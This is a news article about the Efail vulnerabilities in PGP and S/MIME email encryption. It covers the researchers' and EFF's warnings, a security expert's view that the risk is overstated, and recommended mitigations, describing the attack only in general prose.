German and Belgian researchers have warned of potential attacks that break email encryption using Pretty Good Privacy (PGP) and secure multi-purpose internet mail extensions (S/MIME) by coercing clients into sending the full plaintext of the emails to the attacker.
PGP and S/MIME encryption are used by organisations because both add an additional layer of security to email communication and, if used properly, both technologies guarantee confidentiality and authenticity of email messages even if an attacker has full access to an email account.
The researchers said “Efail” describes vulnerabilities in OpenPGP and S/MIME that leak the plaintext of encrypted emails.
One of the researchers, Sebastian Schinzel, who runs the IT security lab at the Münster University of Applied Sciences, tweeted: “There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.”
The research also prompted the Electronic Freedom Foundation (EFF) to issue a warning that encrypted messages sent in the past could be exposed through exploitation of the vulnerability.
The EFF also advised users to stop using PGP/GPG encryption until the issues are more widely understood and fixed, providing links on how to disable PGP/GPG (GNU privacy guard) encryption plugins in email clients.
Users should arrange for the use of alternative end-to-end secure channels, such as Signal, the EFF said in a blog post.
In summary, the researchers said the Efail attacks abuse active content of HTML emails – for example, externally loaded images or styles – to exfiltrate plaintext through requested URLs.
While this sounds alarming, the researchers admit that to create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers.
The attacker would then change an encrypted email in a particular way and send this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
Overreaction to Efail attacks
While the attack is “sneaky”, independent security advisor Graham Cluley is one of several experts who have said the significance and severity of the Efail attacks have been overstated.
The researchers clearly state: “The Efail attacks require the attacker to have access to your S/MIME or PGP encrypted emails. You are thus only affected if an attacker already has access to your emails.”
This fact makes successful exploitation of these newly discovered vulnerabilities an unlikely risk, according to Cluley.
“If a malicious hacker already has access to your email servers, networks and such like, there’s probably all manner of worse and less convoluted things they could be doing to make your life a misery, steal secrets and destroy your privacy,” he wrote in a blog post.
Cluley also highlighted that because Efail attacks rely on past encrypted emails being sent to the target, it is a visible and obvious attack method that could be easily identified using a script that scans incoming email for malformed IMG tags.
Cluley is among several security experts who have pointed out that Efail is not reliant on any inherent weakness in the PGP/GPG being used because it exploits users who have not told their email clients to stop remote or external content from being automatically rendered.
Keep email patches up to date
The researchers have called for the MIME, S/MIME and OpenPGP standards to be updated, saying the Efail attacks exploit flaws and undefined behaviour in these standards.
Cluley also pointed out that it is not a new problem – the root problem of mail clients attempting to display corrupted S/MIME messages has been known about since 2000.
Efail is not a good reason for users of PGP/GPG to disable it entirely, according to Cluley. However, he does point out that there are alternative end-to-end encrypted messaging solutions that do not face the same challenges.
While Efail is not a reason to panic, organisations are advised to keep all email clients updated with the latest security patches. Cluley said organisations should also consider disabling rendering of remote content until the issue is resolved, preventing automatic decryption of email messages and requiring users to manually request decryption instead to reduce the chances of data leakage via active content.
The researchers claim that they have disclosed their findings “responsibly” to international computer emergency readiness teams (Certs), GNU PG developers and the affected suppliers, which have applied (or are in the process of applying) countermeasures.
“Please note that, in general, these countermeasures are specific hotfixes and we cannot rule out that extended attacks with further backchannels or exfiltrations will be found,” they said.
The researchers also warned that even if all backchannels are closed, both standards are still vulnerable to attacks where the attacker can modify email content or inject malicious code into attachments which get executed in a context beyond email client.